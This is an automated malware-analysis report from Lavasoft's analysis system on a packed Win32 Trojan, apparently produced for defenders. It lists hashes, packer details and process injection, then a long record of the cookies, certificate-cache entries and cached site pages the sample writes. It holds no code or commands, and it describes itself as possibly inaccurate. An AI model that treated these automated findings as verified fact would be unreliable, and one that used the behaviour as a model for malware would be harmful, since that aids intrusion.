Trojan.Encpk.Gen.4_dbbb1662e0

by malwarelabrobot on July 2nd, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Encpk.Gen.4 (B) (Emsisoft), Trojan.Encpk.Gen.4 (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: dbbb1662e069cad25746331f4b65a05d
SHA1: e2bff274254ceae3b2d0a1ed52e61458a472e31b
SHA256: d47855b9361e012fde950ec14d12035ae496a66a469f0b609ab254aa5e51bdd2
SSDeep: 1536:fbkMGnouy831oooooooooooZfJxfj8F0K1mAIUYLqBS j9/oI325WGsF:j2out3EfJJh/oWqBh5/kk
Size: 72844 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2013-09-13 03:50:19
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3676

The Trojan injects its code into the following process(es):

%original file name%.exe:2624

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3457FDAA13DF726057FF405C2970DA8B (1054 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\itgsolutions_nl[1].htm (694 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\MZJ4C755.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\62B37F20965376D7AE7A52389623ED72 (527 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05C228D5A90F8E552A04359DBA3E6884 (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CGMU6O9X.txt (249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab203.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (104 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\17FE92B829E591BC459ACE26B928A914 (2646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\combine_or_id[1].htm (10354 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar204.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\alternative-aquitaine_co_uk[1].htm (248 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0255CEC2C51D081EFF40366512890989_791739868612F2F571F41B54D1643609 (944 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\87CD74335D81E59B3AD1335BFD4C2A0E (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\kafrit_com[1].htm (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QSV3FF8R.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A (736 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YKOEJOCX.txt (83 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FE8390C335990B3814546A790944878B (527 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\17FE92B829E591BC459ACE26B928A914 (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\WG6F7F7A.txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\87CD74335D81E59B3AD1335BFD4C2A0E (360 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D2E70F910D3215B7410B46A6E8BBA6B5 (2184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar14EE.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\678B9F95B126F50368710CA85CB2F3DA_AB8D94F29896452B4806732E3EB7F2B7 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D27C82366D91771CBE95D6164650B7EB (527 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\pferd_com[1].htm (291 bytes)
C:\Users\"%CurrentUserName%"\tebufsufeapa.exe (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O9QM8YOH.txt (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6TEFDBE7.txt (1132 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\WXZZNY49.txt (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA (1472 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (4816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\RE070MB2.txt (272 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BD5208ADDEC1165FD57AF2BF2F455EAA_7E3FFE794FF28BFE1B1F173FDFF37406 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\RMK71TC0.txt (129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EED293ME.txt (324 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CMJBW712.txt (279 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08 (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CMQU8KEN.txt (370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\83KRSCD5.txt (68 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\wp[1].htm (236 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9EC3B71635F8BA3FC68DE181A104A0EF_F6C39EF89D8A3A72327D8412589658B2 (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A7J9LGMN.txt (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\pferd_com[1].htm (291 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1401C7EC8E96BC79CBFD92F9DF762D_4CE1C8FADD10DC56D6C641AD452A20BD (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IDM204RI.txt (316 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LBCCV48U.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3GHP7CYS.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TW4ZIEEZ.txt (616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3A7IHOLU.txt (246 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BNGT7O4L.txt (87 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05C228D5A90F8E552A04359DBA3E6884 (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\378B079587A9184B2E2AB859CB263F40_2B618FC6CF84AEF3C14E129161BF18D9 (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KH07RBI1.txt (120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7RNXQXPU.txt (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C9E3282A673263848AB7F0C007FD3AF1_A8B7EB8E1B4EFC36EE88BC2F4B7529BF (2646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4FREVB0A.txt (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab2A1C.tmp (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\meubles-jacquelin_com[1].htm (5911 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6JDQWYI7.txt (97 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\cbsprinting_com_au[1].htm (8177 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab14ED.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771 (1688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\glmghotels_com[1].htm (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NBPVUVIV.txt (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A34B45DD28A5DAEFDA3E0BA2FCE7DE24_21C23C94E1347473379C1C62E36AE785 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\itgsolutions_nl[1].htm (232 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dbcomponents_com[2].htm (6484 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TM7MY6UT.txt (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\m[1].htm (718 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\44005FCFFDFBCF74691B1070F563009E (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\B9AEL02I.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G3UVMW6F.txt (119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q64T2BBU.txt (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\glmghotels_com[1].htm (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar29CD.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\bigtopmultimedia_net[1].htm (14804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\shipeliteexpress_com[1].htm (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\L27MXZYQ.txt (276 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\shbrazil_com[1].htm (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DOTXE4DT.txt (80 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OXJZ4EUR.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab29CC.tmp (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\wp[1].htm (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FVF1A4YM.txt (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7C09F2708B252F662BAF75AB70B0130E (2224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BGIOWIPG.txt (119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\racknstackwarehouse_com_au[1].htm (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D (1720 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FE8390C335990B3814546A790944878B (2200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\201FLYKT.txt (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6KR62LCW.txt (249 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3457FDAA13DF726057FF405C2970DA8B (1616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3YMS88UC.txt (116 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab2D2.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AR7D3Y4H.txt (85 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\doctsf_com[1].htm (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AT3YCDW8.txt (271 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6E8EC72EA24AED36E3FD7C28C9975F2A (527 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\de-de[2].htm (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D2E70F910D3215B7410B46A6E8BBA6B5 (527 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FGK8E349.txt (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EAGGR7R9.txt (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\de-de[1].htm (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\domain_profile[1].htm (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AQNNN2UI.txt (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KL2KT1W7.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dbcomponents_com[1].htm (12194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3SEEZ577.txt (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F (1512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar17B0.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YBWDBATR.txt (116 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6VAUSNX4.txt (272 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4 (1480 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S1WYXYWK.txt (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\photoclubs_com[1].htm (4930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\thedonaldsongroup_com[1].htm (1043 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4 (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PAJCAVW3.txt (304 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PQIEY0I7.txt (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1BB09BEEC155258835C193A7AA85AA5B_5B6699C51F5CFEEC1143E1241F407692 (1472 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OPQLX3ZZ.txt (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W64Z6F4O.txt (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\suspendedpage[1].htm (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\itgsolutions_nl[1].htm (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66A4D23D5A95B47B7FD5EA9A68B334D (2192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\acicinvestor_ca[1].htm (18325 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\theprintinghouseltd_co_uk[1].htm (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab17AF.tmp (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8YRU9P3R.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab214.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66A4D23D5A95B47B7FD5EA9A68B334D (527 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\hugedomains_com[1].htm (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab153D.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\theprintinghouseltd_co_uk[1].htm (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220 (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar215.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\10191SJR.txt (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7C09F2708B252F662BAF75AB70B0130E (527 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9EC3B71635F8BA3FC68DE181A104A0EF_F6C39EF89D8A3A72327D8412589658B2 (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TIDXMUD3.txt (146 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\R0TMR57B.txt (76 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5AOG7S4X.txt (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OU5SWEX8.txt (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\J99Z3K1R.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BD5208ADDEC1165FD57AF2BF2F455EAA_7E3FFE794FF28BFE1B1F173FDFF37406 (2032 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HQAIFSP3.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1BB09BEEC155258835C193A7AA85AA5B_5B6699C51F5CFEEC1143E1241F407692 (472 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\F7NV82CU.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2EUSQ9ZW.txt (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\theprintinghouseltd_co_uk[1].htm (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ACF244F1A10D4DBED0D88EBA0C43A9B5_3FB9EBFC1D18D5E09631A5E5A62F6EF3 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab180E.tmp (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08 (5028 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0SX0GB8W.txt (468 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ACF244F1A10D4DBED0D88EBA0C43A9B5_3FB9EBFC1D18D5E09631A5E5A62F6EF3 (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D27C82366D91771CBE95D6164650B7EB (2216 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\UH2Z9IC8.txt (302 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8ZHRE7HO.txt (1120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar2D3.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\perc_ca[1].htm (6346 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\62B37F20965376D7AE7A52389623ED72 (2224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar2A1D.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\coop_nl[1].htm (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A34B45DD28A5DAEFDA3E0BA2FCE7DE24_21C23C94E1347473379C1C62E36AE785 (836 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0255CEC2C51D081EFF40366512890989_791739868612F2F571F41B54D1643609 (1868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\austriansurfing_at[1].htm (24 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\juizi_com[1].htm (19 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9REMY2UW.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\taykon_com[1].htm (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\shipeliteexpress_com[1].htm (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\21DB7KUK.txt (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\espace-hotelier_com[1].htm (5584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\domain_profile[1].htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar180F.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1401C7EC8E96BC79CBFD92F9DF762D_4CE1C8FADD10DC56D6C641AD452A20BD (2604 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F (314 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\naijagurus_com[1].htm (1898 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\itgsolutions_nl[1].htm (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7XWZCSWZ.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\bigtopmultimedia_net[1].htm (17572 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6E8EC72EA24AED36E3FD7C28C9975F2A (2192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ompgp_co_jp[1].htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220 (1488 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA (728 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\J5CUMQNQ.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C9E3282A673263848AB7F0C007FD3AF1_A8B7EB8E1B4EFC36EE88BC2F4B7529BF (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BFAGMFJV.txt (73 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar153E.tmp (2712 bytes)
